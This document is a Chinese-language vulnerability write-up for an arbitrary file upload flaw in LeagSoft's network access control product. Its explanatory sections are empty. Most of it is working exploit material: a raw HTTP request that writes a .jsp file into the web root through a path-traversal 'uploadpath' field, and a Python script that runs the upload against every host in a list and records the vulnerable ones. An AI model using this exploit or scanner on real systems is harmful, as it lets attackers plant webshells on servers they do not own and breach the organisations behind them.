联软准入 任意文件上传漏洞

一、漏洞简介

二、漏洞影响

三、复现过程

POST /uai/download/uploadfileToPath.htm HTTP/1.1
Host: www.0-sec.org:8099
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 308
Content-Type: multipart/form-data; boundary=ea8ef2c3b016cd152a651d2799ef2c5c

--ea8ef2c3b016cd152a651d2799ef2c5c
Content-Disposition: form-data; name="input_localfile"; filename="111.jsp"
Content-Type: text/plain

aaaaa
--ea8ef2c3b016cd152a651d2799ef2c5c
Content-Disposition: form-data; name="uploadpath";

../webapps/notifymsg/devreport/
--ea8ef2c3b016cd152a651d2799ef2c5c--

上传路径：

https://www.0-sec.org/notifymsg/devreport/111.jsp

poc

poc.py

import requests


def main(line):
    proxies = {'http': 'http://localhost:8080'}
    # url = 'https://www.0-sec.org/uai/download/uploadfileToPath.htm'
    url = line + '/uai/download/uploadfileToPath.htm'
    url_2 = line.strip() + '/notifymsg/devreport/{}'
    filename = '111.txt'
    files = {
        'input_localfile': (filename, open(filename), 'text/plain'),
    }
    content = {
        'uploadpath': '../webapps/notifymsg/devreport/'
    }
    res = requests.post(url, files=files, proxies=proxies, data=content, verify=False)
    # print(res.text)
    res_2 = requests.get(url_2.format(filename), verify=False)
    if 'xxx' in res_2.text:
        print('ok....')
        with open('ok.txt', mode='a') as f:
            f.write(url_2.format(filename) + '\n')
            print('写入成功...')


if __name__ == '__main__':
    with open('ip.txt', mode='r') as f:
        for line in f.readlines():
            if line == '\n':
                pass
            main(line)

参考链接

https://blog.csdn.net/m0_48520508/article/details/108790281